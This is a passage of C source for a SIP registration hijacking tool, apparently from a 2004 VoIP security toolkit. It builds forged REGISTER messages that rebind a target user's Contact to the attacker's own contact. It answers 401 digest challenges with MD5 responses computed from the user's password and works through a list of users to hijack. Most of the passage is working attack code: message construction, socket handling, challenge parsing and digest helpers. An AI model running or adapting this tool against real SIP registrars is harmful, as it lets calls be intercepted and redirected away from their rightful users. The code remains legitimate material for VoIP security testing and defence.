              __REGHIJACKER_SOURCE_PORT );
    strcat( sipPayload, VIA_BRANCH );
    
    if ( ( psBranch = GetNextGuid() ) == NULL )
    {
        printf("\nBranch ID failure\n" );
        CleanupAndExit( EXIT_FAILURE );
    }

    strcat( sipPayload, psBranch );     // new Branch value
    strcat( sipPayload, VIA_TAIL );

    //  Generate From header
    strcat( sipPayload, FROM_HEAD );
    strcat( sipPayload, psUser );
    strcat( sipPayload, " <sip:" );
    strcat( sipPayload, psUser );
    strcat( sipPayload, "@" );
    strcat( sipPayload, hostIPv4AddrDotted );
    strcat( sipPayload, ">;tag=" );
    strcat( sipPayload, psFromTag );    // same From tag as 1st Register
    strcat( sipPayload, FROM_TAIL );

    //  Generate To header
    strcat( sipPayload, TO_HEAD );
    strcat( sipPayload, psUser );
    strcat( sipPayload, " <sip:" );
    strcat( sipPayload, psUser );
    strcat( sipPayload, "@" );
    strcat( sipPayload, hostIPv4AddrDotted );
    strcat( sipPayload, TO_TAIL );                        
    
    //  Generate Call-ID
    strcat( sipPayload, CALL_ID_HEAD );                        
    strcat( sipPayload, psCallID );     // same Call-ID as 1st Register
    strcat( sipPayload, CALL_ID_TAIL );
    
    //  Generate CSeq
    cseq++;                             // increment CSeq
    strcat( sipPayload, CSEQ_HEAD );
    snprintf( sipPayload + strlen( sipPayload ), 10, "%d", cseq );
    strcat( sipPayload, CSEQ_TAIL );
    
    //  Generate Max-Forwards                        
    strcat( sipPayload, MAX_FORWARDS_HEAD );
    
    //  Generate Contact header to replace hijack user's registration                        
    strcat( sipPayload, CONTACT_HEAD );
    strcat( sipPayload, psHijackContactInfo );
    strcat( sipPayload, CONTACT_TAIL );
    
    // Generate Expiration
    strcat( sipPayload, EXPIRES_ADD );

    // Generate Content Length
    strcat( sipPayload, CONTENT_LEN_HEAD );

    // All SIP Headers must end with CRLF
    strcat( sipPayload, END_OF_HEADERS );
    
    transmitMsgAndResetTimer();
    
    bAlreadyChallenged = false;

}  //  end  hijackRegisterNewContact()


//-----------------------------------------------------------------------------
//
//   hijackRegisterNewContactAuth()
//
//  In this state of the Registration Hijacker FSM, a 401 Unauthorized
//  response was received for a prior attempt bind the user within the
//  his Registrar to the host running the hijacker. This state parses
//  the 401 message (i.e. an Authentication Challenge) to retrieve the
//  parms required to compute the MD5 authentication digest for the
//  user being hijacked. If the parms are found, then the digest is
//  computed and an Authorization header is added to the REGISTER
//  message that is requesting to bind the user to the hijacker. That
//  REGISTER message is transmitted to the Registrar.
//
//  Tested: 09/17/2004 - Mark O'Brien
//
//-----------------------------------------------------------------------------

void  hijackRegisterNewContactAuth()
{
    //  Parse the 401 Unauthorized (i.e. Auth Challenge) message in
    //  responsePayload to cull the realm and nonce parms required
    //  by the MD5 digest calculation. If successful, globals psRealm
    //  and psNonce are set to point to substrings created within the
    //  responsePayload string (i.e. destructive to responsePayload)
    
    if ( !parseChallenge() )
    {
        free( psBranch );
        psBranch = NULL;
        free( psCallID );
        psCallID = NULL;
        free( psFromTag );
        psFromTag = NULL;
        
        hijackerState = HIJACK_TERMINUS;
        return;
    }

    // Now have the minumum inputs required to calculate the
    // MD5 digest response for a revised REGISTER message

    DigestCalcHA1( "md5",
                   psUser,
                   psRealm,
                   psPassword,
                   psNonce,
                   psCNonce,
                   HA1 );
    
    DigestCalcResponse( HA1,
                        psNonce,
                        szNonceCount,
                        psCNonce,
                        psQop,
                        "REGISTER",     // method
                        registrarUri,
                        HA2,
                        digestResponse );
                        
    if ( bVerbose )
    {
        printf( "\nResponse Digest = %s\n", digestResponse );
    }
    
    fprintf( hResultFile, "\nResponse Digest = %s\n", digestResponse );
    
    // Build Revised Register message with a new header line of the following format:
    //      Authorization: Digest username="username",
    //                                   realm="realm from Challenge",
    //                                   nonce="nonce from Challenge",
    //                                   uri="registrar's uri",
    //                                   response="responseDigest",
    //                                   algorithm=md5
    
    sipPayload[0] = '\0';	// start with fresh SIP Payload as a NUL String

    //  Generate Request Method
    strcat( sipPayload, METHOD_HEAD );
    strcat( sipPayload, psDomainSipRegistrarIPv4Addr );
    strcat( sipPayload, METHOD_TAIL );

    //  Generate Via
    strcat( sipPayload, VIA_HEAD );
    strcat( sipPayload, hostIPv4AddrDotted );
    strcat( sipPayload, ":" );
    snprintf( sipPayload + strlen( sipPayload ) , 6, "%d",
              __REGHIJACKER_SOURCE_PORT );
    strcat( sipPayload, VIA_BRANCH );
    
    if ( ( psBranch = GetNextGuid() ) == NULL )
    {
        printf("\nBranch ID failure\n" );
        CleanupAndExit( EXIT_FAILURE );
    }

    strcat( sipPayload, psBranch );     // new Branch value
    strcat( sipPayload, VIA_TAIL );

    //  Generate From header
    strcat( sipPayload, FROM_HEAD );
    strcat( sipPayload, psUser );
    strcat( sipPayload, " <sip:" );
    strcat( sipPayload, psUser );
    strcat( sipPayload, "@" );
    strcat( sipPayload, hostIPv4AddrDotted );
    strcat( sipPayload, ">;tag=" );
    strcat( sipPayload, psFromTag );    // same From tag as 1st Register
    strcat( sipPayload, FROM_TAIL );

    //  Generate To header
    strcat( sipPayload, TO_HEAD );
    strcat( sipPayload, psUser );
    strcat( sipPayload, " <sip:" );
    strcat( sipPayload, psUser );
    strcat( sipPayload, "@" );
    strcat( sipPayload, hostIPv4AddrDotted );
    strcat( sipPayload, TO_TAIL );                        
    
    //  Generate Call-ID
    strcat( sipPayload, CALL_ID_HEAD );                        
    strcat( sipPayload, psCallID );     // same Call-ID as 1st Register
    strcat( sipPayload, CALL_ID_TAIL );
    
    //  Generate CSeq
    cseq++;                             // increment CSeq
    strcat( sipPayload, CSEQ_HEAD );
    snprintf( sipPayload + strlen( sipPayload ), 10, "%d", cseq );
    strcat( sipPayload, CSEQ_TAIL );
    
    //  Generate Max-Forwards                        
    strcat( sipPayload, MAX_FORWARDS_HEAD );
    
    //  Generate Contact header to replace hijack user's registration                        
    strcat( sipPayload, CONTACT_HEAD );
    strcat( sipPayload, psHijackContactInfo );
    strcat( sipPayload, CONTACT_TAIL );
    
    //  Generate Authorization header
    strcat( sipPayload, AUTHORIZATION_HEAD );
    strcat( sipPayload, psUser );
    strcat( sipPayload, "\",realm=\"" );
    strcat( sipPayload, psRealm );
    strcat( sipPayload, "\",nonce=\"" );
    strcat( sipPayload, psNonce );
    strcat( sipPayload, "\",uri=\"" );
    strcat( sipPayload, registrarUri );
    strcat( sipPayload, "\",response=\"" );
    strcat( sipPayload, digestResponse );
    strcat( sipPayload, "\",algorithm=md5\r\n" );

    // Generate Expiration
    strcat( sipPayload, EXPIRES_ADD );

    // Generate Content Length
    strcat( sipPayload, CONTENT_LEN_HEAD );

    // All SIP Headers must end with CRLF
    strcat( sipPayload, END_OF_HEADERS );

    transmitMsgAndResetTimer();
    
    bAlreadyChallenged = true;
    
    hijackerState = HIJACK_WAIT_NEW_REGISTRATION_OK;
    
}  //  end hijackRegisterNewContactAuth


//-----------------------------------------------------------------------------
//
//   hijackWaitNewRegistrationOk()
//
//  In this state of the Registration Hijacker FSM, a wait is 
//  performed for the 200 status response to the REGISTER
//  message sent to the Registrar to bind the user to a
//  contact specifed by the hijacker. Only a 200 status response
//  or a 401 Unauthorized response are expected. Other
//  messages received on the socket are discarded. 
//
//  The wait is performed by the "select" statement using the
//  time out structure initialized in the transition to this state.
//  On Linux systems, the select statement decrements the
//  time out structure value each time a packet is avaiable to
//  be read from the socket. The select is reactivated if an
//  unexpected message is received. Eventually, either an
//  appropriate message is received or the response is timed
//  out.
//
//  NOTE: Operating Systems other than Linux might not
//                decrement the time out structure value each time
//                a packet is ready to be read. If the select is
//                reactivated, a full time out interval may be 
//                initiated. If many spurious messages are being
//                received on the socket, this state may never time
//                out!
//
//  If the select times out, the hijacking of the current user
//  ends.
//
//  If a 200 or 401 message is received, the Via branch parameter
//  must match the value sent in the REGISTER request message.
//  A matching 200 status response establishes the fact that the
//  target user has been successfully hijacked. Clean up is
//  performed and the state machine terminates. A matching 401
//  Unauthorized response results in the state machine transitioning
//  to one of:
//
//  a) the state where a new REGISTER message will be sent 
//      with the MD5 digest computed from the user's id, password,
//      the method (i.e. REGISTER), and parms received in the
//      401 Unauthorized message (e.g. nonce, realm).
//
//  b) termination of the user's hijacking if this is not the 1st
//       401 message received for the user while attempting to 
//       bind the user to the hijacker contact information
//       (presumably a race condition has occurred where the
//       user has been deleted from the Registrar, his password
//       has changed, or an agent has detected the hijacker).
//
//  Tested: 09/17/2004 - Mark O'Brien
//
//-----------------------------------------------------------------------------

void  hijackWaitNewRegistrationOk()
{
    // select socket                                        
    FD_ZERO( &socketFdSet );
    FD_SET( sockfd, &socketFdSet );

    selectStatus = select( sockfd + 1,
                           &socketFdSet,
                           NULL,
                           NULL,
                           &timeOut );

    switch ( selectStatus )
    {
        case -1:        //  error
            perror( "\nWait New Contact Reg OK - select" );
            CleanupAndExit( EXIT_FAILURE );
            break;
        
        case  0:        //  time out
            printf( "\nHijack of user %s has timed out!\n",
                    psUser );
        
            fprintf( hResultFile,
                     "\nTimed Out Waiting for REGISTER response - skipping on\n\n" );

            //  skip past this user
            
            free( psBranch );
            psBranch = NULL;
            free( psCallID );
            psCallID = NULL;
            free( psFromTag );
            psFromTag = NULL;
        
            hijackerState = HIJACK_TERMINUS;
            break;
        
        case  1:        //  a message is ready on input port
            socketAddressLength = sizeof( remoteAddress );
        
            responsePayloadLen = recvfrom( sockfd,
                                    responsePayload,
                                    socketReceiveBufferSize,
                                    0,
                                    ( struct sockaddr * )&remoteAddress,
                                    &socketAddressLength );
                                      
            if ( responsePayloadLen == -1 )
            {
                perror( "\nrecvfrom payload error");
                CleanupAndExit( EXIT_FAILURE );    
            }

            // FIXME - Some quick and dirty parsing. It should be improved.
            
            responsePayload[ responsePayloadLen ] = '\0';
            
            if ( strstr( responsePayload, "SIP/2.0 200" ) )
            {
                //  have a SIP response OK - is it for the outstanding REGISTER?
                //  scan to find the expected echo for the branch tag
                
                if ( strstr( responsePayload, psBranch ) )
                {
                    if ( bVerbose )
                    {
                        printf( "\n%s\n", responsePayload );
                    }
                    
                    fprintf( hResultFile, "\n%s\n",
                             responsePayload );
                    
                    //  A match! User has been hijacked!!
                    //  Terminate the state machine
                    
                    free( psBranch );
                    psBranch = NULL;
                    free( psCallID );
                    psCallID = NULL;
                    free( psFromTag );
                    psFromTag = NULL;
                    
                    hijackerState = HIJACK_TERMINUS;
                }
                else
                {
                    ;  // ignore this message - continue waiting
                }
            }
            else if ( strstr( responsePayload, "SIP/2.0 401" ) )
            {
                //  401 UnAuthorized - a challenge - but is it for outstanding REGISTER?
                
                if ( strstr( responsePayload, psBranch ) )
                {
                    if ( bVerbose )
                    {
                        printf( "\n%s\n", responsePayload );
                    }
                    
                    fprintf( hResultFile, "\n%s\n",
                             responsePayload );
                    
                    //  try to authenticate to the Registrar only if this is the first
                    //  challenge received while attempting to hijack (i.e. bind
                    //  a new contact for) this user
                    
                    if ( bAlreadyChallenged )
                    {
                        // note the failure and skip this user
                        
                        if ( bVerbose )
                        {
                            printf( "\nFailed Auth Challenge for user %s - skipping on\n\n",
                                    psUser );
                        }
                        
                        fprintf( hResultFile, 
                                 "\nFailed Auth Challenge for user %s - skipping on\n\n",
                                 psUser );
                        
                        //  skip past this user
                        
                        free( psBranch );
                        psBranch = NULL;
                        free( psCallID );
                        psCallID = NULL;
                        free( psFromTag );
                        psFromTag = NULL;

                        hijackerState = HIJACK_TERMINUS;
                    }
                    else
                    {
                        //  try to authenticate as this user.
                        
                        free( psBranch );
                        psBranch = NULL;
                        
                        hijackerState = HIJACK_REGISTER_NEW_CONTACT_AUTH;
                    }
                }
                else
                {
                    ;  // ignore this message - no transition
                }
            }
            break;

        default:        // unexpected number of sockets have ready input
            fprintf( stderr,
                     "\nselect in hijacker state %d: Too many ready %d:\n",
                     HIJACK_WAIT_NEW_REGISTRATION_OK,
                     selectStatus );
        
            CleanupAndExit( EXIT_FAILURE );
            break;
        
    }  // end switch (selectStatus)

}  //  end  hijackWaitNewRegistrationOk()

//-----------------------------------------------------------------------------
//
//   transmitMsgAndResetTimer()
//
//   Record the message that is about to be transmitted.
//
//   Transmit the sipPayload to the predefined and bound
//   global registration hijacker socket.
//
//   Initialize the global timer structure that may be used
//   by a later process to time a response interval.
//
//   If an error occurs, report the error and exit the 
//   main process.
//
//  Tested: 09/17/2004 - Mark O'Brien
//
//-----------------------------------------------------------------------------

void  transmitMsgAndResetTimer()
{
    int bytesWritten    = 0;
    int payloadSent     = 0;

    if ( bVerbose )
    {
        printf( "\n%s\n", sipPayload );
    }
    
    fprintf( hResultFile, "\n%s\n", sipPayload );

    //  Output the REGISTER msg to the wire.
    payloadSent = sendto( sockfd,
                          sipPayload,
                          strlen( sipPayload ),
                          0,
                          ( struct sockaddr * )&remoteAddress,
                          sizeof( remoteAddress ) );

    if ( payloadSent < 0 )
    {
        perror( "\nSend socket failure - ");
        CleanupAndExit( EXIT_FAILURE );
    }
    else if ( payloadSent < strlen( sipPayload ) )
    {
        fprintf( stderr,
                 "\nSend Socket failure - %d bytes sent of %d byte payload\n",
                 payloadSent, strlen( sipPayload ) );
        CleanupAndExit( EXIT_FAILURE );
    }

    //  Initialize the time out to the max. wait interval for a response to
    //  a REGISTER message. While blocked in a socket "select" statement,
    //  unexpected messages may be received causing the "select" to 
    //  unblock. Each time the select statement unblocks, the timer
    //  structure is automatically updated with the time remaining. 
    //
    //  NOTE: Not all operating systems update the countdown time 
    //                structure in the "select" statement, but Linux does.
    
    timeOut.tv_sec  = __REGHIJACKER_REGISTER_MSG_TIMEOUT;
    timeOut.tv_usec = 0;

}  //  end transmitMsgAndResetTimer()


//-----------------------------------------------------------------------------
//
//   parseChallenge()
//
//   Parse the 401 Unauthorized message in responsePayload.
//   It is an Authentication Challenge. Identify the MD5 
//   digest algorithm Realm and Nonce parameters.
//
//   Return true if the parameters are located and false
//   otherwise. Parms are identifed by psRealm and psNonce.
//
//   This function is destructive to the responsePayload strings
//   in that NUL characters are inserted at the appropriate
//   points to cull discrete strings for the Realm and Nonce
//   params in place.
//
//  Limitations:
//
//    1) Presumes no header abbreviations
//
//  Tested: 09/17/2004 - Mark O'Brien
//
//-----------------------------------------------------------------------------

bool  parseChallenge()
{
    char *psChallengeHead           = NULL,
         *psChallengeHeadOriginal   = NULL,
         *psChallengeTail           = NULL,
         *psChallengeTailOriginal   = NULL,
         *psPayloadLower            = NULL,
         *psRealmHeader             = NULL,
         *psNonceHeader             = NULL,
         *psLineForErrorReporting   = NULL,
         *psCloseDblQuote           = NULL;

    const char  CHALLENGE_HEAD[]    = "www-authenticate: ";
    const char  REALM_HEAD[]        = "realm=\"";
    const char  NONCE_HEAD[]        = "nonce=\"";
    const char  CHALLENGE_TAIL[]    = "\r\n";
    
    int i;
       
    //  Make a lower case copy of the responsePayload to faciliate scanning
    //  for the Challenge Header and the parm fields in a case-insensitive manner.
    //  The offset of scanning results in copy are used to locate the values of
    //  interest back in the original payload.

    psPayloadLower =
            (char *) strndup( responsePayload, strlen( responsePayload ) );
    
    for ( i = 0; i < strlen( psPayloadLower ); i++ )
    {
        psPayloadLower[i] = tolower( psPayloadLower[i] );
    }
 
    // Scan for "WWW-Authenticate :" header in this 401 response
    
    psChallengeHead = strstr( psPayloadLower, CHALLENGE_HEAD );
    if ( !psChallengeHead )
    {
        //  Required header missing in Challenge
        if ( bVerbose )
        {
            printf( "\nWWW-Authenticate: header missing from Challenge. Skipping User\n" );
        }
        
        fprintf( hResultFile,
                 "\nWWW-Authenticate: header missing from Challenge. Skipping User\n" );

        free( psPayloadLower );            
        return false;
    }
    
    //  Scan for end of Proxy-Authenticate header
    
    psChallengeTail = strstr( psChallengeHead + strlen( CHALLENGE_HEAD ),
                              CHALLENGE_TAIL );
    if ( !psChallengeTail )
    {
        //  Proxy-Authentication line is malformed
        if ( bVerbose )
        {
            printf( "\nWWW-Authenticate: header line malformed. Skipping User\n" );
        }
        
        fprintf( hResultFile,
                 "\nWWW-Authenticate: header line malformed. Skipping User\n" );                            
        
        free( psPayloadLower );
        return false;
    }
    
    //  Terminate the lower case sipPayload string at the end of the Proxy-Authenticate line.
    
    *psChallengeTail = '\0';    
    
    //  Since this function is destructive to the Proxy-Authenticate line in the
    //  original Payload, save a duplicate for use in error reporting. The
    //  relative offset of the scanning results in the lower case payload is
    //  used to position within the original responsePayload.
    
    psChallengeHeadOriginal = responsePayload +
                                ( psChallengeHead - psPayloadLower );
    
    psChallengeTailOriginal = responsePayload +
                                ( psChallengeTail - psPayloadLower );
    
    *psChallengeTailOriginal = '\0';
    
    psLineForErrorReporting =
        (char *) strndup( psChallengeHeadOriginal,
                          strlen( psChallengeHeadOriginal ) );

    //  Parse the lower case Proxy-Authenticate line for components required
    //  to perform MD5 digest computation. 

    //  The scanning results are translated back to the original challenge header.
    //  That original header in the responsePayload is modified to replace the
    //  dbl quote that signals the end of parm values with end-of-string
    //  characters (i.e. '\0'). In effect, psChallengeHeadOriginal is carved up into
    //  substrings.
    
    //  Scan for the realm parameter
        
    if ( !( psRealmHeader = strstr( psChallengeHead, REALM_HEAD ) ) )
    {
        if ( bVerbose )
        {
            printf( "WWW-Authenticate line: no realm value. Skipping User:\n%s\n",
                    psLineForErrorReporting );
            
            fprintf( hResultFile,
                     "WWW-Authenticate line: no realm value. Skipping User:\n%s\n",
                     psLineForErrorReporting );
        }
        
        free( psPayloadLower );
        free( psLineForErrorReporting );
        return false;
    }
    
    //  Translate the position of the matching pattern from the case-insensitive
    //  scanning string back to the original header line.
    
    psRealm = psChallengeHeadOriginal +
                ( psRealmHeader + strlen( REALM_HEAD ) - psChallengeHead );
    psCloseDblQuote = psRealm;
    
    if ( !( psCloseDblQuote = strchr( psCloseDblQuote, '"' ) ) ) // scan for ending dbl quote
    {
        if ( bVerbose )
        {
            printf( "WWW-Authenticate line: malformed realm value. Skipping User:\n%s\n",
                     psLineForErrorReporting );

            fprintf( hResultFile,
                     "WWW-Authenticate line: malformed realm value. Skipping User:\n%s\n",
                     psLineForErrorReporting );
        }
                
        free( psPayloadLower );
        free( psLineForErrorReporting );
        return false;
    }

    *psCloseDblQuote = '\0'; // Isolate the realm in-line as a string in the original payload.

    //  Scan for the nonce parameter
    
    if ( !( psNonceHeader = strstr( psChallengeHead, NONCE_HEAD ) ) )
    {
        if ( bVerbose )
        {
            printf( "Proxy-Authenticate line: no nonce value. Skipping User:\n%s\n",
                    psLineForErrorReporting );

            fprintf( hResultFile,
                     "Proxy-Authenticate line: no nonce value. Skipping User:\n%s\n",
                     psLineForErrorReporting );
        }
        
        free( psPayloadLower );
        free( psLineForErrorReporting );
        return false;
    }

    //  Translate the position of the matching pattern from the case-insensitive
    //  scanning string back to the original header line.
    
    psNonce = psChallengeHeadOriginal +
                ( psNonceHeader + strlen( NONCE_HEAD ) - psChallengeHead );    
    psCloseDblQuote = psNonce;
    
    if ( !( psCloseDblQuote = strchr( psCloseDblQuote, '"' ) ) ) // scan for ending dbl quote
    {
        if ( bVerbose )
        {
            printf( "WWW-Authenticate line: malformed nonce value. Skipping User:\n%s\n",
                    psLineForErrorReporting );

            fprintf( hResultFile,
                     "WWW-Authenticate line: malformed nonce value. Skipping User:\n%s\n",
                     psLineForErrorReporting );         
        }
                
        free( psPayloadLower );
        free( psLineForErrorReporting );
        return false;
    }

    *psCloseDblQuote = '\0'; // Isolate the nonce in-line as a string.

    free( psPayloadLower );
    free( psLineForErrorReporting );

    return true;
    
}  // end parseChallenge()


//-----------------------------------------------------------------------------
//  catch_signals
//
//  signal catcher and handler
//  arg1: (int) signal number
//  ret:  none, we exit the program from here
//-----------------------------------------------------------------------------

void  catch_signals ( int signo )
{
    switch ( signo )
	{
        case	SIGINT:
		case	SIGTERM:
		{
            printf ( "\nexiting...\n" );
            CleanupAndExit ( EXIT_SUCCESS );
        }
    }
}


//-----------------------------------------------------------------------------
//  CleanupAndExit
//
//  arg1: (int) status to report  i.e. EXIT_SUCCESS or EXIT_FAILURE
//  ret:  the status (or nothing in the event the call to this funtion
//           is redundant
//-----------------------------------------------------------------------------

void  CleanupAndExit ( int status )
{
    int rc;
    
    if ( sockfd > 0 )
    {
        if ( bVerbose )
        {
            printf( "\nclosing socket\n" );
        }
        
        close( sockfd );
    }
    
    if ( bUsersFilePresent )
    {
        if ( bVerbose )
        {
            printf ( "\nclosing username file\n" );
        }
        
        fclose ( hUsersToHijackFile );
    }

    if ( hResultFile )
    {
        if ( bVerbose )
        {
            printf ( "\nclosing results file\n" );
        }
        
        fclose ( hResultFile );
    }
    
    if ( psBranch )
    {
        free ( psBranch );
        psBranch = NULL;
    }
    
    if ( psCallID )
    {
        free ( psCallID );
        psCallID = NULL;
    }
    
    if ( psFromTag )
    {
        free ( psFromTag );
        psFromTag = NULL;
    }
    
    if ( responsePayload )
    {
        free ( responsePayload );
        responsePayload = NULL;
    }
    
    exit ( status );
}


//-------------------------------------------------------------------------------
//  The following was extracted from RFC 2617
//  HTTP Authentication: Basic and Digest Access Authentication
//
//  convert Hex
//
//   Copyright (C) The Internet Society (1999).  All Rights Reserved.
//
//   This document and translations of it may be copied and furnished to
//   others, and derivative works that comment on or otherwise explain it
//   or assist in its implementation may be prepared, copied, published
//   and distributed, in whole or in part, without restriction of any
//   kind, provided that the above copyright notice and this paragraph are
//   included on all such copies and derivative works.  However, this
//   document itself may not be modified in any way, such as by removing
//   the copyright notice or references to the Internet Society or other
//   Internet organizations, except as needed for the purpose of
//   developing Internet standards in which case the procedures for
//   copyrights defined in the Internet Standards process must be
//   followed, or as required to translate it into languages other than
//   English.
//
//   The limited permissions granted above are perpetual and will not be
//   revoked by the Internet Society or its successors or assigns.
//
//   This document and the information contained herein is provided on an
//   "AS IS" basis and THE INTERNET SOCIETY AND THE INTERNET ENGINEERING
//   TASK FORCE DISCLAIMS ALL WARRANTIES, EXPRESS OR IMPLIED, INCLUDING
//   BUT NOT LIMITED TO ANY WARRANTY THAT THE USE OF THE INFORMATION
//   HEREIN WILL NOT INFRINGE ANY RIGHTS OR ANY IMPLIED WARRANTIES OF
//   MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE.
//
//   And that code in RFC 2617 was itself derived from RFC 1321 to which
//   an RSA Copyright applies:
//
//  Copyright (C) 1991-2, RSA Data Security, Inc. Created 1991. All
//  rights reserved.
//
//  License to copy and use this software is granted provided that it
//  is identified as the "RSA Data Security, Inc. MD5 Message-Digest
//  Algorithm" in all material mentioning or referencing this software
//  or this function.
//
//  License is also granted to make and use derivative works provided
//  that such works are identified as "derived from the RSA Data
//  Security, Inc. MD5 Message-Digest Algorithm" in all material
//  mentioning or referencing the derived work.
//
//  RSA Data Security, Inc. makes no representations concerning either
//  the merchantability of this software or the suitability of this
//  software for any particular purpose. It is provided "as is"
//  without express or implied warranty of any kind.
// 
//  These notices must be retained in any copies of any part of this
//  documentation and/or software.
//
//-------------------------------------------------------------------------------

void  CvtHex(
    IN HASH Bin,
    OUT HASHHEX Hex
    )
{
    unsigned short i;
    unsigned char j;

    for (i = 0; i < HASHLEN; i++) {
        j = (Bin[i] >> 4) & 0xf;
        if (j <= 9)
            Hex[i*2] = (j + '0');
         else
            Hex[i*2] = (j + 'a' - 10);
        j = Bin[i] & 0xf;
        if (j <= 9)
            Hex[i*2+1] = (j + '0');
         else
            Hex[i*2+1] = (j + 'a' - 10);
    }
    Hex[HASHHEXLEN] = '\0';
}


//-------------------------------------------------------------------------------
//  The following was extracted from RFC 2617
//  HTTP Authentication: Basic and Digest Access Authentication
//
//  calculate H(A1) as per spec 
//
//   Copyright (C) The Internet Society (1999).  All Rights Reserved.
//
//   This document and translations of it may be copied and furnished to
//   others, and derivative works that comment on or otherwise explain it
//   or assist in its implementation may be prepared, copied, published
//   and distributed, in whole or in part, without restriction of any
//   kind, provided that the above copyright notice and this paragraph are
//   included on all such copies and derivative works.  However, this
//   document itself may not be modified in any way, such as by removing
//   the copyright notice or references to the Internet Society or other
//   Internet organizations, except as needed for the purpose of
//   developing Internet standards in which case the procedures for
//   copyrights defined in the Internet Standards process must be
//   followed, or as required to translate it into languages other than
//   English.
//
//   The limited permissions granted above are perpetual and will not be
//   revoked by the Internet Society or its successors or assigns.
//
//   This document and the information contained herein is provided on an
//   "AS IS" basis and THE INTERNET SOCIETY AND THE INTERNET ENGINEERING
//   TASK FORCE DISCLAIMS ALL WARRANTIES, EXPRESS OR IMPLIED, INCLUDING
//   BUT NOT LIMITED TO ANY WARRANTY THAT THE USE OF THE INFORMATION
//   HEREIN WILL NOT INFRINGE ANY RIGHTS OR ANY IMPLIED WARRANTIES OF
//   MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE.
//
//   And that code in RFC 2617 was itself derived from RFC 1321 to which
//   an RSA Copyright applies:
//
//  Copyright (C) 1991-2, RSA Data Security, Inc. Created 1991. All
//  rights reserved.
//
//  License to copy and use this software is granted provided that it
//  is identified as the "RSA Data Security, Inc. MD5 Message-Digest
//  Algorithm" in all material mentioning or referencing this software
//  or this function.
//
//  License is also granted to make and use derivative works provided
//  that such works are identified as "derived from the RSA Data
//  Security, Inc. MD5 Message-Digest Algorithm" in all material
//  mentioning or referencing the derived work.
//
//  RSA Data Security, Inc. makes no representations concerning either
//  the merchantability of this software or the suitability of this
//  software for any particular purpose. It is provided "as is"
//  without express or implied warranty of any kind.
// 
//  These notices must be retained in any copies of any part of this
//  documentation and/or software.
//
//-------------------------------------------------------------------------------

void  DigestCalcHA1(
    IN char * pszAlg,
    IN char * pszUserName,
    IN char * pszRealm,
    IN char * pszPassword,
    IN char * pszNonce,
    IN char * pszCNonce,
    OUT HASHHEX SessionKey
    )
{
      MD5_CTX Md5Ctx;
      HASH HA1;

      MD5Init(&Md5Ctx);
      MD5Update(&Md5Ctx, pszUserName, strlen(pszUserName));
      MD5Update(&Md5Ctx, ":", 1);
      MD5Update(&Md5Ctx, pszRealm, strlen(pszRealm));
      MD5Update(&Md5Ctx, ":", 1);
      MD5Update(&Md5Ctx, pszPassword, strlen(pszPassword));
      MD5Final(HA1, &Md5Ctx);
      if (strcasecmp(pszAlg, "md5-sess") == 0) {
            MD5Init(&Md5Ctx);
            MD5Update(&Md5Ctx, HA1, HASHLEN);
            MD5Update(&Md5Ctx, ":", 1);
            MD5Update(&Md5Ctx, pszNonce, strlen(pszNonce));
            MD5Update(&Md5Ctx, ":", 1);
            MD5Update(&Md5Ctx, pszCNonce, strlen(pszCNonce));
            MD5Final(HA1, &Md5Ctx);
      }
      CvtHex(HA1, SessionKey);
}


//-------------------------------------------------------------------------------
//  The following was extracted from RFC 2617
//  HTTP Authentication: Basic and Digest Access Authentication
//
//  calculate request-digest/response-digest as per HTTP Digest spec
//
//   Copyright (C) The Internet Society (1999).  All Rights Reserved.
//
//   This document and translations of it may be copied and furnished to
//   others, and derivative works that comment on or otherwise explain it
//   or assist in its implementation may be prepared, copied, published
//   and distributed, in whole or in part, without restriction of any
//   kind, provided that the above copyright notice and this paragraph are
//   included on all such copies and derivative works.  However, this
//   document itself may not be modified in any way, such as by removing
//   the copyright notice or references to the Internet Society or other
//   Internet organizations, except as needed for the purpose of
//   developing Internet standards in which case the procedures for
//   copyrights defined in the Internet Standards process must be
//   followed, or as required to translate it into languages other than
//   English.
//
//   The limited permissions granted above are perpetual and will not be
//   revoked by the Internet Society or its successors or assigns.
//
//   This document and the information contained herein is provided on an
//   "AS IS" basis and THE INTERNET SOCIETY AND THE INTERNET ENGINEERING
//   TASK FORCE DISCLAIMS ALL WARRANTIES, EXPRESS OR IMPLIED, INCLUDING
//   BUT NOT LIMITED TO ANY WARRANTY THAT THE USE OF THE INFORMATION
//   HEREIN WILL NOT INFRINGE ANY RIGHTS OR ANY IMPLIED WARRANTIES OF
//   MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE.
//
//   And that code in RFC 2617 was itself derived from RFC 1321 to which
//   an RSA Copyright applies:
//
//  Copyright (C) 1991-2, RSA Data Security, Inc. Created 1991. All
//  rights reserved.
//
//  License to copy and use this software is granted provided that it
//  is identified as the "RSA Data Security, Inc. MD5 Message-Digest
//  Algorithm" in all material mentioning or referencing this software
//  or this function.
//
//  License is also granted to make and use derivative works provided
//  that such works are identified as "derived from the RSA Data
//  Security, Inc. MD5 Message-Digest Algorithm" in all material
//  mentioning or referencing the derived work.
//
//  RSA Data Security, Inc. makes no representations concerning either
//  the merchantability of this software or the suitability of this
//  software for any particular purpose. It is provided "as is"
//  without express or implied warranty of any kind.
// 
//  These notices must be retained in any copies of any part of this
//  documentation and/or software.
//
//-------------------------------------------------------------------------------

void  DigestCalcResponse(
    IN HASHHEX HA1,           // H(A1)
    IN char * pszNonce,       // nonce from server
    IN char * pszNonceCount,  // 8 hex digits 
    IN char * pszCNonce,      // client nonce
    IN char * pszQop,         // qop-value: "", "auth", "auth-int" 
    IN char * pszMethod,      // method from the request 
    IN char * pszDigestUri,   // requested URL
    IN HASHHEX HEntity,       // H(entity body) if qop="auth-int"
    OUT HASHHEX Response      // request-digest or response-digest
    )
{
      MD5_CTX Md5Ctx;
      HASH HA2;
      HASH RespHash;
      HASHHEX HA2Hex;

      // calculate H(A2)
      MD5Init(&Md5Ctx);
      MD5Update(&Md5Ctx, pszMethod, strlen(pszMethod));
      MD5Update(&Md5Ctx, ":", 1);
      MD5Update(&Md5Ctx, pszDigestUri, strlen(pszDigestUri));
      if (strcasecmp(pszQop, "auth-int") == 0) {
            MD5Update(&Md5Ctx, ":", 1);
            MD5Update(&Md5Ctx, HEntity, HASHHEXLEN);
      }
      MD5Final(HA2, &Md5Ctx);
       CvtHex(HA2, HA2Hex);

      // calculate response
      MD5Init(&Md5Ctx);
      MD5Update(&Md5Ctx, HA1, HASHHEXLEN);
      MD5Update(&Md5Ctx, ":", 1);
